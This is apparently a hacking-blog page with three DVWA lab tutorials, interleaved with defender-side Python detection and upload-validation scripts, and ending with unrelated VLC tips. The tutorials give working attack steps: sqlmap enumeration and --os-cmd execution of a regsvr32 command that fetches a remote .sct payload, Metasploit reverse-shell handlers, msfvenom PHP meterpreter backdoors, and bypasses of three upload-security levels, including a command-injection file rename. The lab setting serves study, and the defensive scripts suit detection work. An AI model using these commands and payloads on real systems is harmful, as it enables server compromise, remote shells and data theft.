Showing posts with label Best of Hacking. Show all posts

Command Injection Exploitation through SQL Injection using Sqlmap in DVWA

In this article we will see how to perform command injection through SQL injection using sqlmap, and try to execute an arbitrary cmd command through sqlmap when the web server has an SQL injection vulnerability.

Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, sqlmap tool

First, install the DVWA lab in your XAMPP or WAMP server (read the full article here).
Now open DVWA on your PC and log in with the following credentials:
Username – admin
Password – password

Click on DVWA Security and set the website security level to low.


From the list of vulnerabilities select SQL Injection for your attack. Type user ID 1 in the text box. Don't click the submit button before setting the browser proxy; set your browser proxy so that Burp Suite can intercept the request.


Turn on Burp Suite, click Proxy in the menu bar and make sure Intercept is on. Come back and click the submit button in DVWA. Burp Suite will show the "cookie" and "referer" headers in the captured request, which we will use later in the sqlmap commands.


Let's enumerate all database names by passing the captured cookie to sqlmap:
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" --dbs


Notice in the image given below that it has dumped the names of all databases. Now we are going to choose dvwa for the command injection attack.


Now open another terminal for the Metasploit framework and type msfconsole.

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts a .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and the PowerShell download and execute) can occur on the same port.

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvport 5555
msf exploit(regsvr32_applocker_bypass_server) > exploit

The module above generates the malicious code shown highlighted (a regsvr32 command that references the hosted .sct file and scrobj.dll). Copy the selected part; we will run it through a sqlmap command next.


Now we're going to execute it as a CMD command through sqlmap's --os-cmd option, so paste the code above into the sqlmap command as shown in the image given below.

sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" -D dvwa --os-cmd="regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"


Then type 4 for the PHP payload and 1 for the common location, so that sqlmap uploads its payload as a backdoor on the victim PC.


As soon as the command executes, come back to the Metasploit framework and you will see that meterpreter session 1 has opened.
Type sessions -i 1
meterpreter > sysinfo
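From the defender's side, this whole sequence is visible in the web server's access log: the enumeration requests sqlmap sends to the sqli page, the INTO OUTFILE write it uses for its stager, and the regsvr32 command passed through the same parameter. The scanner below is an added example in Python and is not part of the original post or of sqlmap; the Apache-style log lines in SAMPLE_LOG are constructed for the demo (the client address, the stager file name tmpudemo.php and the .sct name are made up), and the signature set and burst threshold are assumptions to tune for a real site.

```python
"""Scan access-log lines for sqlmap-style SQL injection and the OS-command
execution attempt that follows it.  Defender-side example; every log line
below is constructed, not captured from the lab."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" log format, as written by XAMPP's Apache.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# What sqlmap sends while enumerating (--dbs) and while reaching for the OS
# (--os-cmd / --os-shell) through the same injectable parameter.
SIGNATURES = {
    "sqli-union": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "sqli-tautology": re.compile(r"'\s*(or|and)\s+'?\w+'?\s*=\s*'?\w+", re.I),
    "sqli-time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "sqli-file-write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "oscmd-regsvr32-sct": re.compile(r"regsvr32\b.*\bscrobj\.dll\b", re.I),
    "oscmd-shell-pipe": re.compile(r"\|\s*(copy|cmd|powershell|dir|type|whoami)\b", re.I),
}
BURST_THRESHOLD = 4  # requests from one client to one path within the sample; assumption

# Constructed sample: one client hammering the sqli page, then calling the stager.
SAMPLE_LOG = """\
192.168.0.104 - - [10/Mar/2018:10:00:01 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4812
192.168.0.104 - - [10/Mar/2018:10:00:02 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29%20AND%20%27a%27%3D%27a&Submit=Submit HTTP/1.1" 200 4812
192.168.0.104 - - [10/Mar/2018:10:00:03 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20schema_name%2CNULL%20FROM%20information_schema.schemata--%20-&Submit=Submit HTTP/1.1" 200 5120
192.168.0.104 - - [10/Mar/2018:10:00:04 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20%27stager%27%2CNULL%20INTO%20OUTFILE%20%27C%3A%2Fxampp%2Fhtdocs%2Ftmpudemo.php%27--%20-&Submit=Submit HTTP/1.1" 200 4812
192.168.0.104 - - [10/Mar/2018:10:00:05 +0530] "POST /tmpudemo.php?cmd=regsvr32%20%2Fs%20%2Fn%20%2Fu%20%2Fi%3Ahttp%3A%2F%2F192.168.0.104%3A5555%2Fdemo.sct%20scrobj.dll HTTP/1.1" 200 128
192.168.0.103 - - [10/Mar/2018:10:01:00 +0530] "GET /dvwa/index.php HTTP/1.1" 200 2201
"""

def parse_line(line):
    """Parse one combined-format line; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_url"] = unquote_plus(rec["url"])  # signatures are matched on the decoded form
    return rec

def classify(decoded_url):
    """Sorted list of signature names that match one decoded URL."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded_url))

def scan(log_text):
    """Per-request signature findings, followed by per-client burst findings."""
    findings = []
    per_client_path = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["decoded_url"].split("?", 1)[0]
        per_client_path[(rec["ip"], path)] += 1
        labels = classify(rec["decoded_url"])
        if labels:
            findings.append({"ip": rec["ip"], "path": path, "labels": labels, "url": rec["decoded_url"]})
    for (ip, path), n in per_client_path.items():
        if n >= BURST_THRESHOLD:
            findings.append({"ip": ip, "path": path, "labels": ["burst-same-endpoint"], "url": f"{n} requests"})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["labels"], f["path"])
```

The burst heuristic matters in practice: sqlmap's individual payloads vary, but a flood of requests to one endpoint from one client within seconds is the cheapest signal, and a rate limiter or WAF in front of the sqli page would have stopped this lab's --dbs step long before --os-cmd was reached.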

Shell Uploading through SQL Injection using Sqlmap in bWAPP


Shell Uploading in Web Server Using Sqlmap
Hey Guys!! You may have used sqlmap many times to get database information from a web server through SQL injection. In this tutorial I will show you "how to upload a backdoor and get a meterpreter session" when the website suffers from an SQL injection vulnerability.
Table of Content
§  DVWA Lab Set-Up
§  Navigate to page Vulnerable to SQL injection
§  Intercept the Browser Request (Burp-suite)
§  Save Intercept data in a text file
§  Extracting database name (SQLMAP)
§  Spawning os-shell (SQLMAP)
§  Explore file Stager in the browser
§  Generating PHP backdoor (msfvenom)
§  Run Multi-handler (Metasploit)
§  Upload Msfvenom PHP Backdoor and execute
§  Obtain Meterpreter Shell

DVWA Lab Set-Up

Requirement:
Xampp/Wamp Server
DVWA web vulnerable application
Kali Linux: Burp suite, sqlmap tool

First, install the DVWA lab in your XAMPP or WAMP server (read the full article here).

Navigate to Page Vulnerable to SQL Injection

Now let's navigate to DVWA through the web browser and log in with the following credentials:
Username – admin
Password – password
Click on DVWA Security and set the website security level to low.
From the list of vulnerabilities select SQL Injection for your attack. Type user ID 1 in the text box. Don't click the submit button before setting the web browser proxy; set your browser proxy so that Burp Suite can intercept the request.



Intercept the Browser Request

Now let's intercept the browser request with the following steps:
§  After setting the network proxy in the web browser, turn on Burp Suite.
§  Click on Proxy in the menu bar, then make sure Intercept is on.
§  Come back and click the submit button in DVWA.
§  Copy the intercepted data and save it in a text file.

The Intercept tab displays the HTTP and WebSocket messages that pass between your browser and web servers. Burp Suite will show the "cookie" and "referer" headers in the captured request, which can be used in sqlmap commands directly.


Extracting Database Name

Now use sqlmap for SQL injection and run the following command to enumerate the database names:
sqlmap -r file --dbs --batch
Here the -r option tells sqlmap to read the HTTP request from "file", and as you can observe it has dumped DVWA as the database name.

Spawning os-shell
Now type the following command to make sqlmap spawn an os-shell on the web server (dvwa):
sqlmap -r file -D dvwa --os-shell
It will try to upload a backdoor; if you want a PHP backdoor inside the web server, type 4 for the PHP payload.

Type 4 for a brute-force search to find a writable directory to upload it to.
It tries to upload the file to "/xampp/htdocs/" using SQL injection techniques. As soon as the file is uploaded it prints the INFO message "the file stager has been successfully uploaded on /xampp/htdocs/" and you get an os-shell on the victim PC. It also shows the path of the file stager, where you can manually upload your own backdoor; look at the highlighted URL:
http://192.168.1.105:80/tmpurufu.php

Explore File Stager in the Browser
Open the URL http://192.168.1.105/tmpurufu.php in the browser. In the screenshot given below you can read the page heading "sqlmap file uploader"; it lets you browse for your backdoor and upload it to the /xampp/htdocs/ directory of the web server (dvwa).
Generating PHP Backdoor
Let's prepare the malicious PHP file with msfvenom that we will upload:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw
Copy the generated code into shell.php on the desktop; we will later browse to this file to upload it to the web server. Meanwhile, load the Metasploit framework by typing msfconsole and start multi/handler.


Upload & Execute Msfvenom PHP Backdoor

Click on the Browse tab to select your backdoor file (shell.php) and then click Upload.
GREAT!!! It shows "Admin File is uploaded", which means the backdoor shell.php has been uploaded.


To execute the backdoor on the target machine, open the URL 192.168.1.105/shell.php in the browser and you will receive a reverse connection through multi/handler.

Obtain Meterpreter Shell

msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.1.109
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter>sysinfo

Divine!!! Here we have got our meterpreter session 1.
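Both artefacts this tutorial leaves behind, the sqlmap file stager that --os-shell drops into /xampp/htdocs/ and the shell.php uploaded through it, are new PHP files in the web root, which is the simplest thing for a defender to watch. The audit below is an added example in Python, not DVWA's or sqlmap's code: it takes a hash baseline of a web root, then reports every file that is new, modified or deleted since, and ranks PHP files whose content carries upload-stager or command-execution markers. The web root, the stager name tmpudemo.php and all file contents in demo() are constructed in a temporary directory.

```python
"""Baseline-and-diff audit of a PHP web root, to catch dropped stagers and
uploaded shells.  Defender-side example; the demo web root is constructed."""
import hashlib
import os
import re
import tempfile

# Markers typical of upload stagers and web shells; used only to rank findings,
# a new PHP file is reported whether or not they match.
SUSPECT_RE = re.compile(
    rb"move_uploaded_file|\$_FILES|\b(eval|system|passthru|shell_exec|exec)\s*\("
)
PHP_EXTS = (".php", ".phtml", ".php5")

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(webroot):
    """Map relative path -> sha256 for every file under the web root."""
    baseline = {}
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, webroot)] = sha256_file(full)
    return baseline

def audit(webroot, baseline):
    """Return (relative path, status, suspicious) tuples; status is 'new',
    'modified' or 'deleted'.  suspicious is True only for PHP files whose
    content matches SUSPECT_RE."""
    findings = []
    current = build_baseline(webroot)
    for rel, digest in sorted(current.items()):
        if baseline.get(rel) == digest:
            continue
        status = "modified" if rel in baseline else "new"
        suspicious = False
        if rel.lower().endswith(PHP_EXTS):
            with open(os.path.join(webroot, rel), "rb") as f:
                suspicious = SUSPECT_RE.search(f.read()) is not None
        findings.append((rel, status, suspicious))
    for rel in sorted(set(baseline) - set(current)):
        findings.append((rel, "deleted", False))
    return findings

def demo():
    """Constructed web root: take a baseline, then simulate the two drops."""
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "dvwa", "hackable", "uploads")
        os.makedirs(uploads)
        with open(os.path.join(root, "dvwa", "index.php"), "wb") as f:
            f.write(b"<?php echo 'home'; ?>")
        with open(os.path.join(uploads, "dvwa_email.png"), "wb") as f:
            f.write(b"\x89PNG\r\n\x1a\n")
        baseline = build_baseline(root)
        # A stager-like file in the web root (constructed stand-in for sqlmap's tmpu....php).
        with open(os.path.join(root, "tmpudemo.php"), "wb") as f:
            f.write(b"<?php if (isset($_FILES['file'])) { move_uploaded_file($_FILES['file']['tmp_name'], 'x'); } ?>")
        # The uploaded backdoor (constructed placeholder, not msfvenom output).
        with open(os.path.join(uploads, "shell.php"), "wb") as f:
            f.write(b"<?php /* constructed placeholder */ ?>")
        # An ordinary edit to a known file, reported as modified but not suspicious.
        with open(os.path.join(root, "dvwa", "index.php"), "ab") as f:
            f.write(b"\n")
        return audit(root, baseline)

if __name__ == "__main__":
    for rel, status, suspicious in demo():
        print(f"{status:9s} {'SUSPECT' if suspicious else '       '} {rel}")
```

In production the baseline comes from the deployment artefact or package manifest rather than from the live directory, and the job runs from cron or a file-integrity monitor. Upstream of detection, sqlmap's --os-shell on MySQL writes the stager with INTO OUTFILE, which needs the FILE privilege and is blocked by a restrictive secure_file_priv; the database account a web application uses should have neither.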


Hack File upload Vulnerability in DVWA (Bypass All Security)

File upload vulnerabilities are a major problem in web-based applications. In many web servers this vulnerability arises from functionality that lets an attacker upload a file with malicious code hidden inside, which can then be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

The attacker may also reveal internal information of the web server to others, and there is a chance that sensitive data is accessed by unauthorized people.

In DVWA the web page allows the user to upload an image; the page's code checks whether the last characters of the file name are '.jpg', '.jpeg' or '.png' before allowing the image to be uploaded into the directory.

Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, metasploit framework

Install the DVWA lab in your XAMPP or WAMP server (read the full article here).

Now open DVWA in your browser at your local IP, 192.168.1.102:81/DVWA, and log in with the following credentials:

Username – admin
Password – password

Bypass Low Level Security


Click on DVWA Security and set the website security level to low.


Open a terminal in Kali Linux and create a PHP backdoor with the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
Copy and paste the highlighted code into Leafpad and save it with the PHP extension as hack.php on the desktop.


Come back to your DVWA lab and click the File Upload option in the vulnerability menu.
Now click the Browse button, choose hack.php, and click Upload; this uploads your file into a directory on the server.


After the PHP file is uploaded, DVWA shows the directory path where the file was saved. Copy the selected part and paste it into the URL to execute it:
hackable/uploads/hack.php


Before opening this URL in the browser, start the multi handler in the Metasploit framework with the commands below. While the multi handler is running, open the URL of the PHP file in the browser. This will give you meterpreter session 1.
192.168.1.102:81/DVWA/hackable/uploads/hack.php


msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 3333
msf exploit(handler) > run
meterpreter > sysinfo


Bypass Medium Level Security

Click on DVWA Security and set the website security level to medium.


Create the PHP backdoor the same way:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
Now save the selected code as raj.php.jpeg on the desktop. This file will be uploaded under medium security, which differs slightly from low security in that it apparently checks the file's extension.


Come back to your DVWA lab and click the File Upload option in the vulnerability menu.
Again click the Browse button and select raj.php.jpeg. Now start Burp Suite and turn Intercept on under the Proxy tab. Don't forget to set the manual proxy in your browser, then click Upload.


The Intercept tab will catch the POST request when you click the Upload button. Now change raj.php.jpeg to raj.php.


Compare the change before uploading your PHP file. After altering it, click Forward to upload the PHP file into the directory.


This shows the directory path where the file was successfully uploaded.
hackable/uploads/raj.php


Now repeat the same process as in low security to execute the PHP file from the URL.
192.168.1.102:81/DVWA/hackable/uploads/raj.php


This will give you meterpreter session 2 when you open the URL in the browser.

meterpreter > sysinfo


Bypass High Level Security

Click on DVWA Security and set the website security level to high.


msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw


Now save the selected code as shell.jpeg on the desktop. This file will be uploaded under high security, which differs from low and medium security in that it apparently checks the file's extension as well as a piece of the content; therefore type GIF98 before the PHP code and save it as shell.jpeg.


Repeat the process to browse for and upload shell.jpeg.


Again you will get the directory path of the uploaded file.

This PHP file cannot be executed directly from a URL, since it was uploaded with the .jpeg extension. To rename it into a PHP file, click the Command Injection option in the vulnerability menu. This vulnerability lets you copy and rename shell.jpeg into a PHP file. Type the following in the text box, which copies shell.jpeg to aa.php:

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you submit the command, the PHP file is copied under the new name aa.php.


Now repeat the process to execute the PHP file from the URL.
192.168.1.102:81/DVWA/hackable/uploads/aa.php


Wonderful!! Here we get meterpreter session 3 as well.
meterpreter > sysinfo
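The three levels above fail for three different reasons: low checks nothing, medium trusts a value the browser supplies, and high checks the extension and the first bytes but never verifies that the bytes form a complete image or that nothing executable is hidden inside. The code below is an added example in Python, not DVWA's PHP. check_low, check_medium and check_high are simplified models of the behaviour described in the text, not DVWA's real code: medium is modelled as trusting the browser's Content-Type header (which was already set to image/jpeg from the original .jpeg extension before the name was changed to raj.php in the proxy), and high as an extension check plus a GIF/JPEG/PNG signature check, which the GIF98 prefix satisfies. The file contents are constructed placeholders, not msfvenom output. validate_hardened shows the checks that reject all three uploads while still accepting real images.

```python
"""Upload checks modelled on the three DVWA levels, tried against the three
files from the tutorial, next to a hardened validator.  Added example; the
level checks are simplified models and the file bytes are constructed."""
import os
import re
import secrets

# Constructed stand-in for the msfvenom output; not a working payload.
PHP_BACKDOOR = b"<?php /* constructed placeholder for the generated PHP stager */ ?>"

# (filename as received by the server, browser-declared Content-Type, bytes)
UPLOADS = {
    "low":    ("hack.php",   "application/x-php", PHP_BACKDOOR),
    "medium": ("raj.php",    "image/jpeg",        PHP_BACKDOOR),          # renamed in the proxy
    "high":   ("shell.jpeg", "image/jpeg",        b"GIF98" + PHP_BACKDOOR),
}

MAGIC = {b"\xff\xd8\xff": "jpeg", b"\x89PNG\r\n\x1a\n": "png", b"GIF": "gif"}
TRAILER = {"jpeg": b"\xff\xd9", "png": b"IEND\xae\x42\x60\x82"}
IMAGE_EXTS = {".jpg", ".jpeg", ".png"}
SCRIPT_RE = re.compile(rb"<\?(php|=)|<script\b", re.I)

def sniff(data):
    """Image type from the leading bytes; None if no known signature."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

# --- simplified models of the three DVWA levels (assumption, not DVWA's code) ---
def check_low(name, ctype, data):
    return True                                    # anything lands in hackable/uploads/

def check_medium(name, ctype, data):
    return ctype in {"image/jpeg", "image/png"}    # trusts the client's Content-Type

def check_high(name, ctype, data):
    ext = os.path.splitext(name)[1].lower()        # extension plus a glance at the first bytes
    return ext in IMAGE_EXTS and sniff(data) is not None

# --- hardened validator ---
ALLOWED = {"jpeg": ".jpg", "png": ".png"}          # GIF deliberately not accepted here

def validate_hardened(name, ctype, data, max_bytes=2_000_000):
    """Return (accepted, reason, server_side_name).  ctype is deliberately
    ignored: it is chosen by the client and proves nothing."""
    if not data or len(data) > max_bytes:
        return False, "empty or oversized upload", None
    kind = sniff(data)
    if kind not in ALLOWED:
        return False, "content is not a supported image", None
    ext = os.path.splitext(name)[1].lower()
    if ext not in IMAGE_EXTS or (kind == "png") != (ext == ".png"):
        return False, "extension does not match detected image type", None
    if not data.endswith(TRAILER[kind]):
        return False, "data appended after the image trailer", None
    if SCRIPT_RE.search(data):
        return False, "script markers inside image data", None
    # Never reuse the client's filename; the extension follows the detected type.
    return True, "ok", secrets.token_hex(8) + ALLOWED[kind]

def run_levels():
    """For each tutorial upload: does its level accept it, and does the hardened check?"""
    checks = {"low": check_low, "medium": check_medium, "high": check_high}
    return {level: {"level_accepts": checks[level](name, ctype, data),
                    "hardened_accepts": validate_hardened(name, ctype, data)[0]}
            for level, (name, ctype, data) in UPLOADS.items()}

if __name__ == "__main__":
    for level, verdict in run_levels().items():
        print(f"{level:6s} {verdict}")
```

Storing accepted files outside the web root under the returned random name, and serving them through a handler that sets Content-Type from the detected type, also defeats the copy-to-aa.php step in the high-level section: a file the web server never executes cannot become a shell by being renamed.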

Best of VLC Media Player Tricks (Part 2)

How to Play Multiple Video in VLC

Open the VLC media player.
Go to the Tool Tab present in the menu bar of the media player, and then select Preferences.


Open the Interface Settings, then select Allow only one instance under Instances and save.


Now you can enqueue any number of items in the playlist while the current item keeps playing. The items will be played in regular succession without gaps, in the order stored in the playlist.

How to Add Your Images and Text in VLC
Open the VLC Media Player
Select Effects and Filters from the Tool Tab present in the menu bar of the Media Player.


Now go to Video effects > Overlay,

(a) Select Add logo to add the desired image in the VLC Media Player. Browse for the image using (. . .) and adjust its transparency level and position on the screen.

(b) Select Add text; enter the text you want to display and set its position.


We can see the image and text entered in the selected position while playing the video.


How to Rotate Video using VLC
Open the VLC Media Player
Go to the Menu Bar; select Tools > Effects and Filters.


Now go to Video Effects > Geometry, select Transform and Rotate and adjust the Angle of Rotation.


Now we will get the video rotated by the chosen angle, similar to the one shown below.



How to Extract Audio Track from DVD
Play the DVD in the VLC Media Player.


Now the DVD will start playing in the VLC Media Player. Suppose we have to extract the audio track of Jaws 3; this particular movie is positioned at 3.


Go to the Menu Bar; select Media > Convert/Save.


Open the Disc tab, enter the title number, i.e. the number at which that particular video is located, then select Convert/Save.


Browse for the destination file, change the profile setting to Audio - MP3 and then select Start.


It will start extracting the Audio Track of that particular video.

AUTHOR – This article is written by NUPUR KUMARI, who is pursuing a Bachelor's degree in Information Technology from Bhopal. She is interested in web security.